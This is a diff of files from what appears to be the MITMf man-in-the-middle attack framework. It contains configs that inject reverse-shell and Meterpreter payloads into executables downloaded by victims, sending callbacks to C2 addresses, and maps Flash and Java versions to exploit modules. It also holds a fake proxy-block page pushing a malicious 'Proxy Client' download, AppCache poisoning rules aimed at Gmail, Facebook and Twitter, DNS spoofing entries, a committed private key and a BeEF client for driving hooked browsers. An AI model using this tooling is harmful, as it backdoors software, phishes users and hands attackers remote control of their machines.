PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204
[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194
[FilePwn]
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
[[hosts]]
#whitelist host/IP - patch these only.
#ALL is everything, use the blacklist to leave certain hosts/IPs out
whitelist = ALL
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
blacklist = , # a comma is null do not leave blank
[[keywords]]
#These checks look at the path of a url for keywords
whitelist = ALL
#For blacklist note binaries that you do not want to touch at all
# Also applied in zip files
blacklist = .dll
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on its way
patchCount = 5
# In Bytes
maxSize = 50000000
blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on its way
patchCount = 5
# In Bytes
maxSize = 10000000
blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[[LinuxIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
# PATCH_DLLs as they come across
PATCH_DLL = False
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# XP_MODE - to support XP targets
XP_MODE = True
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = veil_go_payload.exe
MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8088
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = True
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = pentest_x64_payload.exe
MSFPAYLOAD = windows/x64/shell/reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[MachoIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
# Call out the difference for targets here as they differ from ALL
# These settings override the ALL settings
[[[sysinternals.com]]]
LinuxType = None
WindowsType = ALL
CompressedFiles = False
#inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
[[[sourceforge.org]]]
WindowsType = x64
CompressedFiles = False
[[[[WindowsIntelx64]]]]
PATCH_DLL = False
[[[[WindowsIntelx86]]]]
PATCH_DLL = False


@@ -1,31 +0,0 @@
<html>
<head>
<title>Website Blocked: ISA Proxy Server</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Proxy Server</b></div>
</center>
</body>
</html>

Binary file not shown.


@@ -1,3 +0,0 @@
#!/bin/bash
openssl genrsa -out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"


@@ -1,18 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
u0/CRCN/lg==
-----END CERTIFICATE-----


@@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
-----END RSA PRIVATE KEY-----


@@ -0,0 +1,57 @@
[DEFAULT]
; HTML5 AppCache poisoning attack
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine
enabled=True
tamper_class=libs.AppCachePoisonClass
;all settings below are specific for AppCachePoison
templates_path=config_files/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox
; when visiting first url matching following expression we will embed iframes with all tamper URLs
;(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
; it's only useful to mass poison chrome because:
; - it supports iframe sandbox preventing framebusting
; - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[test]
; any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test ; which templates to use for spoofing content?
skip_in_mass_poison=1
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
[gmail]
tamper_url=http://mail.google.com/mail/
; manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default ; could be omitted
[facebook]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook ; use different template
[twitter]
tamper_url=http://twitter.com/
;tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[testing]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
; we can also modify non-HTML URLs to append malicious code to them
; but for them to be cached in HTML5 AppCache they need to be referred in
; manifest for a poisoned domain
; if not, they are "only" cached for 10 years :D
[ga]
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
;you can add other scripts in additional sections like jQuery etc.


@@ -34,5 +34,5 @@
</div>
<div style="padding: 1em;border:1px solid red;margin:1em">
<h1>AppCache Poison works!</h1>
<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
</div>


@@ -0,0 +1,2 @@
;console.log('AppCache Poison was here. Google Analytics FTW');

config_files/dns.cfg (new file)

@@ -0,0 +1,3 @@
#Example config file for dns spoofing
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1

config_files/filepwn.cfg (new file)

@@ -0,0 +1,56 @@
[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on its way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.10.4
PORT = 6666
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.10.4
PORT = 6666
SHELL = iat_reverse_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp

config_files/javapwn.cfg (new file)

@@ -0,0 +1,5 @@
#Example config file for the javapwn plugin
1.702 = "java_atomicreferencearray"
1.704 = "java_verifier_field_access"
1.706 = "java_jre17_exec"
1.707 = "java_jre17_jaxws"


@@ -1,82 +0,0 @@
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
banner2= """
"""
banner3 = """
"""
banner4 = """
"""
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner():
    return random.choice([banner1, banner2, banner3, banner4, banner5])


@@ -1,367 +0,0 @@
#! /usr/bin/env python2.7
# BeEF-API - A Python API for BeEF (The Browser Exploitation Framework) http://beefproject.com/
# Copyright (c) 2015-2016 Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import requests
import json
from UserList import UserList
class BeefAPI:
    def __init__(self, opts=[]):
        self.host = opts.get('host') or "127.0.0.1"
        self.port = opts.get('port') or "3000"
        self.token = None
        self.url = "http://{}:{}/api/".format(self.host, self.port)
        self.login_url = self.url + "admin/login"
    def login(self, username, password):
        try:
            auth = json.dumps({"username": username, "password": password})
            r = requests.post(self.login_url, data=auth)
            data = r.json()
            if (r.status_code == 200) and (data["success"]):
                self.token = data["token"] #Auth token
                self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
                self.modules_url = "{}modules?token={}".format(self.url, self.token)
                self.logs_url = "{}logs?token={}".format(self.url, self.token)
                self.are_url = "{}autorun/rule/".format(self.url)
                self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
                return True
            elif r.status_code != 200:
                return False
        except Exception as e:
            print "[BeEF-API] Error logging in to BeEF: {}".format(e)
    @property
    def hooked_browsers(self):
        r = requests.get(self.hooks_url)
        return Hooked_Browsers(r.json(), self.url, self.token)
    @property
    def dns(self):
        r = requests.get(self.dns_url)
        return DNS(r.json(), self.url, self.token)
    @property
    def logs(self):
        logs = []
        r = requests.get(self.logs_url)
        for log in r.json()['logs']:
            logs.append(Log(log))
        return logs
    @property
    def modules(self):
        modules = ModuleList([])
        r = requests.get(self.modules_url)
        for k,v in r.json().iteritems():
            modules.append(Module(v, self.url, self.token))
        return modules
    @property
    def are_rules(self):
        return ARE_Rules(self.are_url, self.token)
class ModuleList(UserList):
    def __init__(self, mlist):
        self.data = mlist
    def findbyid(self, m_id):
        for m in self.data:
            if m_id == m.id:
                return m
    def findbyname(self, m_name):
        pmodules = ModuleList([])
        for m in self.data:
            if (m.name.lower().find(m_name.lower()) != -1) :
                pmodules.append(m)
        return pmodules
class SessionList(UserList):
    def __init__(self, slist):
        self.data = slist
    def findbysession(self, session):
        for s in self.data:
            if s.session == session:
                return s
    def findbyos(self, os):
        res = SessionList([])
        for s in self.data:
            if (s.os.lower().find(os.lower()) != -1):
                res.append(s)
        return res
    def findbyip(self, ip):
        res = SessionList([])
        for s in self.data:
            if ip == s.ip:
                res.append(s)
        return res
    def findbyid(self, s_id):
        for s in self.data:
            if s.id == s_id:
                return s
    def findbybrowser(self, browser):
        res = SessionList([])
        for s in self.data:
            if browser == s.name:
                res.append(s)
        return res
    def findbybrowser_v(self, browser_v):
        res = SessionList([])
        for s in self.data:
            if browser_v == s.version:
                res.append(s)
        return res
    def findbypageuri(self, uri):
        res = SessionList([])
        for s in self.data:
            if uri in s.page_uri:
                res.append(s)
        return res
    def findbydomain(self, domain):
        res = SessionList([])
        for s in self.data:
            if domain in s.domain:
                res.append(s)
        return res
class ARE_Rule(object):
    def __init__(self, data, url, token):
        self.url = url
        self.token = token
        for k,v in data.iteritems():
            setattr(self, k, v)
        self.modules = json.loads(self.modules)
    def trigger(self):
        r = requests.get('{}/trigger/{}?token={}'.format(self.url, self.id, self.token))
        return r.json()
    def delete(self):
        r = requests.get('{}/delete/{}?token={}'.format(self.url, self.id, self.token))
        return r.json()
class ARE_Rules(object):
    def __init__(self, url, token):
        self.url = url
        self.token = token
    def list(self):
        rules = []
        r = requests.get('{}/list/all?token={}'.format(self.url, self.token))
        data = r.json()
        if (r.status_code == 200) and (data['success']):
            for rule in data['rules']:
                rules.append(ARE_Rule(rule, self.url, self.token))
        return rules
    def add(self, rule_path):
        if rule_path.endswith('.json'):
            headers = {'Content-Type': 'application/json; charset=UTF-8'}
            with open(rule_path, 'r') as rule:
                payload = rule.read()
            r = requests.post('{}/add?token={}'.format(self.url, self.token), data=payload, headers=headers)
            return r.json()
    def trigger(self, rule_id):
        r = requests.get('{}/trigger/{}?token={}'.format(self.url, rule_id, self.token))
        return r.json()
    def delete(self, rule_id):
        r = requests.get('{}/delete/{}?token={}'.format(self.url, rule_id, self.token))
        return r.json()
class Module(object):
    def __init__(self, data, url, token):
        self.url = url
        self.token = token
        for k,v in data.iteritems():
            setattr(self, k, v)
    @property
    def options(self):
        r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
        return r['options']
    @property
    def description(self):
        r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
        return r['description']
    def run(self, session, options={}):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps(options)
        r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload)
        return r.json()
    def multi_run(self, options={}, hb_ids=[]):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids})
        r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload)
        return r.json()
    def results(self, session, cmd_id):
        r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token))
        return r.json()
class Log(object):
    def __init__(self, log_dict):
        for k,v in log_dict.iteritems():
            setattr(self, k, v)
class DNS_Rule(object):
    def __init__(self, rule, url, token):
        self.url = url
        self.token = token
        for k,v in rule.iteritems():
            setattr(self, k, v)
    def delete(self):
        r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token))
        return r.json()
class DNS(object):
    def __init__(self, data, url, token):
        self.data = data
        self.url = url
        self.token = token
    @property
    def ruleset(self):
        ruleset = []
        r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token))
        for rule in r.json()['ruleset']:
            ruleset.append(DNS_Rule(rule, self.url, self.token))
        return ruleset
    def add(self, pattern, resource, response=[]):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps({"pattern": pattern, "resource": resource, "response": response})
        r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload)
        return r.json()
    def delete(self, rule_id):
        r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token))
        return r.json()
class Hooked_Browsers(object):
    def __init__(self, data, url, token):
        self.data = data
        self.url = url
        self.token = token
    @property
    def online(self):
        sessions = SessionList([])
        for k,v in self.data['hooked-browsers']['online'].iteritems():
            sessions.append(Session(v['session'], self.data, self.url, self.token))
        return sessions
    @property
    def offline(self):
        sessions = SessionList([])
        for k,v in self.data['hooked-browsers']['offline'].iteritems():
            sessions.append(Session(v['session'], self.data, self.url, self.token))
        return sessions
class Session(object):
    def __init__(self, session, data, url, token):
        self.session = session
        self.data = data
        self.url = url
        self.token = token
        self.domain = self.get_property('domain')
        self.id = self.get_property('id')
        self.ip = self.get_property('ip')
        self.name = self.get_property('name') #Browser name
        self.os = self.get_property('os')
        self.page_uri = self.get_property('page_uri')
        self.platform = self.get_property('platform') #Ex. win32
        self.port = self.get_property('port')
        self.version = self.get_property('version') #Browser version
    @property
    def details(self):
        r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token))
        return r.json()
    @property
    def logs(self):
        logs = []
        r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token))
        for log in r.json()['logs']:
            logs.append(Log(log))
        return logs
    def update(self, options={}):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps(options)
        r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
        return r.json()
    def run(self, module_id, options={}):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps(options)
        r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload)
        return r.json()
    def multi_run(self, options={}):
        headers = {"Content-Type": "application/json", "charset": "UTF-8"}
        payload = json.dumps({"hb": self.session, "modules":[options]})
        r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload)
        return r.json()
    def get_property(self, key):
        for k,v in self.data['hooked-browsers'].iteritems():
            for l,s in v.iteritems():
                if self.session == s['session']:
                    return s[key]

View file

@ -1,44 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
